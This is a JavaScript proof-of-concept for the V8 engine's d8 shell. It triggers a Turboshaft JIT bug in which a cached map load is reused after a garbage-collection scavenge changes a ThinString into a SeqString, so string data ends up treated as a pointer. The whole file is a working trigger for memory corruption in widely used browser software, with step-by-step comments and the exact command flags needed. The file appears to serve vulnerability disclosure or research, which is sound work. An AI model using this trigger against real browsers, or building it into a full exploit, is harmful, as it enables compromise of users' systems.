function opt_me(str, size) {
    // Although the result of str[0] is not used, Turboshaft will generate an `ObjectIs` Op to check if str is a ThinString.
    // Subsequently, in turboshaft MachineLowering, ObjectIs will generate a `Load(str, +0x0)` Op to load the map field.
    str[0];

    // Allocate a array, generating an `AllocateOp`, which will trigger GC when the young space is exhausted.
    const arr = new Array(size);
    // Use arr to prevent it from being optimized away.
    arr[0];

    // Turboshaft will generate a `StringAt` Op.
    // Turboshaft MachineLowering will optimize StringAt into lower-level nodes, which requires generating a `Load(str, +0x0)` node to load the map field.
    // Turboshaft LateLoadElimination will directly reuse the Load(str, +0x0) generated by the previous `str[0]`.
    // However, in reality: when Allocate triggers GC, the ThinString is migrated to SeqString.
    // The implicit class of `str` has changed, and it needs to be reloaded, so the outdated result cannot be reused, leading to a vulnerability.
    return str[1];  // Note: The result of str[1] must be used, otherwise it will be optimized away.
}

// Generate an object of type SeqString.
// Note: str must be dynamically generated, because compile-time constant strings will be directly internalized.
const str = "AAAA" + 1;   // When the vulnerability is triggered, "AAAA" is treated as a pointer.

// Used as an array index to trigger string internalization.
// str is converted into a ThinString type object, pointing to the internalized string.
const arr = ["a"];
arr[str];

// Optimize opt_me with turbofan.
%PrepareFunctionForOptimization(opt_me);
opt_me(str, 100);
opt_me(str, 100);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(str, 100);

// Continuously execute opt_me, new Array(size) will always exhaust memory, triggering Scavenge.
// Scavenger::EvacuateThinString() will change str from a ThinString to a SeqString type object.
while (1) {
    print("try trigger Scavenge");
    opt_me(str, 0x3000);
}
//./d8 \--expose-gc \--omit-quit \--allow-natives-syntax \--no-turboshaft-loop-unrolling \--turboshaft-loop-peeling \./poc.js